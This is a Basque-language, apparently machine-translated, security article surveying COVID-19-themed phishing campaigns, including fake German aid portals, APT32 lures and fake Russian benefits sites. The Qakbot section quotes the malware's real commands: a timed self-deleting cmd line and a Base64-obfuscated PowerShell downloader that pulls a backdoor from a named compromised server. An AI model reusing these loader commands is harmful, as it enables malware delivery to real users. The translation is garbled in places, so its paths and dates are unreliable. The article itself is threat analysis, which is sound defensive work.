Erasotzaileek COVID-19 gaia ustiatzen jarraitzen dute, eta gero eta mehatxu gehiago sortzen dituzte epidemiarekin zerikusia duen guztiarekin oso interesatuta dauden erabiltzaileentzat. IN Dagoeneko hitz egin dugu koronabirusaren ondorioz zein malware mota agertu ziren, eta gaur herrialde ezberdinetako erabiltzaileek, Errusian barne, ezagutu dituzten gizarte ingeniaritza teknikei buruz hitz egingo dugu. Joera eta adibideak orokorrak moztuta daude.
Gogoratu barruan Jendeak koronavirusari eta epidemiaren ibilbideari buruz ez ezik, finantza-laguntza neurriei buruz ere irakurtzeko prest dagoela hitz egin dugu? Hona hemen adibide on bat. Phishing-eraso interesgarri bat aurkitu zen Alemaniako Ipar Renania-Westfalia edo NRW estatuan. Erasotzaileek Ekonomia Ministerioaren webgunearen kopiak sortu zituzten (), non edonork eska dezake diru-laguntza. Halako programa bat benetan existitzen da, eta iruzurgileentzat onuragarria izan da. Biktimen datu pertsonalak jasota, eskaera bat egin zuten benetako ministerioaren webgunean, baina bankuko beste datu batzuk adierazi zituzten. Datu ofizialen arabera, horrelako 4 mila eskaera faltsu egin ziren eskema aurkitu arte. Ondorioz, kaltetutako herritarrei zuzendutako 109 milioi dolar iruzurgileen esku geratu ziren.
COVID-19rako doako proba bat nahi al duzu?
Koronabirusaren gaikako phishingaren beste adibide esanguratsu bat izan zen posta elektronikoetan. Mezuek erabiltzaileen arreta erakarri zuten koronavirusaren infekzioaren doako probak egiteko eskaintzarekin. Hauen eranskinean Trickbot/Qakbot/Qbot kasuak zeuden. Eta beren osasuna egiaztatu nahi zutenak "eranstutako formularioa betetzen" hasi zirenean, script maltzur bat deskargatu zen ordenagailura. Eta sandboxing probak saihesteko, gidoia birus nagusia deskargatzen hasi zen denbora pixka bat igaro ondoren, babes-sistemak jarduera kaltegarririk gertatuko ez zela sinetsita zeudenean.
Erabiltzaile gehienak makroak gaitzeko konbentzitzea ere erraza izan zen. Horretarako, trikimailu estandar bat erabili zen: galdetegia betetzeko, lehenik makroak gaitu behar dituzu, hau da, VBA script bat exekutatu behar duzu.
Ikus dezakezunez, VBA script-a birusen aurkako antivirusetatik bereziki estalita dago.
Windows-ek itxaron eginbide bat du, non aplikazioak /T <segundo> itxaroten duen "Bai" erantzun lehenetsia onartu aurretik. Gure kasuan, scriptak 65 segundo itxaron zituen aldi baterako fitxategiak ezabatu aurretik:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Eta itxaron bitartean, malware deskargatu zen. PowerShell script berezi bat abiarazi zen horretarako:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 balioa deskodetu ondoren, PowerShell script-ak Alemaniako aurretik hackeatutako web zerbitzarian dagoen atzeko atea deskargatzen du:
http://automatischer-staubsauger.com/feature/777777.pngeta izenpean gordetzen du:
C:UsersPublictmpdirfile1.exe
Folder βC:UsersPublictmpdirβ komandoa duen 'tmps1.bat' fitxategia exekutatzean ezabatzen da cmd /c mkdir ""C:UsersPublictmpdir"".
Gobernu agentzien aurkako eraso zuzendua
Horrez gain, FireEyeko analistek duela gutxi Wuhango gobernu egituretara zuzendutako APT32 eraso baten berri eman zuten, baita Txinako Larrialdien Kudeaketa Ministerioari ere. Banatutako RTFetako batek New York Times izeneko artikulu baterako esteka zuen . Hala ere, irakurtzean, malwarea deskargatu zen (FireEyeko analistek METALJACK gisa identifikatu zuten instantzia).
Interesgarria da detektatzeko unean, antibirus batek ere ez zuen instantzia hau detektatu, Virustotal-en arabera.
Webgune ofizialak behera daudenean
Errusian gertatu zen phishing-eraso baten adibiderik deigarriena herenegun. Horren arrazoia 3 eta 16 urte bitarteko haurrentzat aspaldian itxaroten den prestazio baten izendapena izan zen. 12ko maiatzaren 2020an eskaerak onartzeko hasiera iragarri zenean, milioika Estatu Zerbitzuen webgunera joan ziren aspaldian itxaroten zen laguntza eskatzeko eta ataria ez zuten DDoS eraso profesional bat baino okerragoa izan. Lehendakariak "Gobernu Zerbitzuek ezin izan diotela eskaera-fluxuari aurre egin" esan zuenean, jendea sarean hitz egiten hasi zen eskaerak onartzeko gune alternatibo bat abian jartzeari buruz.
Arazoa da hainbat gune aldi berean lanean hasi zirela eta batek, posobie16.gosuslugi.ru-ko benetakoak, aplikazioak onartzen dituen bitartean, gehiago .
SearchInform-eko lankideek .ru eremuan iruzurrezko 30 domeinu berri inguru aurkitu zituzten. Infosecurity eta Softline konpainiak antzeko 70 gobernu zerbitzuen webgune faltsu baino gehiagoren jarraipena egin dute apirilaren hasieratik. Beren sortzaileek sinbolo ezagunak manipulatzen dituzte eta gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie eta abar hitzen konbinazioak ere erabiltzen dituzte.
Hype eta ingeniaritza soziala
Adibide hauek guztiek baieztatzen dute erasotzaileek koronavirusaren gaia arrakastaz dirua irabazten ari direla. Eta zenbat eta gizarte tentsio handiagoa izan eta arazo argiagoak, orduan eta aukera gehiago izan iruzurgileek datu garrantzitsuak lapurtzeko, jendea beren kabuz dirua ematera behartzeko edo, besterik gabe, ordenagailu gehiago pirateatzeko.
Eta pandemiak prest egon daitezkeen pertsonak etxetik masiboki lan egitera behartu dituela kontuan hartuta, datu pertsonalak ez ezik, datu korporatiboak ere arriskuan daude. Adibidez, duela gutxi Microsoft 365 (lehen Office 365) erabiltzaileek ere phishing-eraso bat jasan zuten. Jendeak "galdutako" ahots-mezu handiak jasotzen zituen letren eranskin gisa. Hala ere, fitxategiak benetan erasoaren biktimak bidaltzen zituen HTML orrialde bat ziren . Ondorioz, sarbidea galtzea eta kontuko datu guztiak arriskuan jartzea.
Iturria: www.habr.com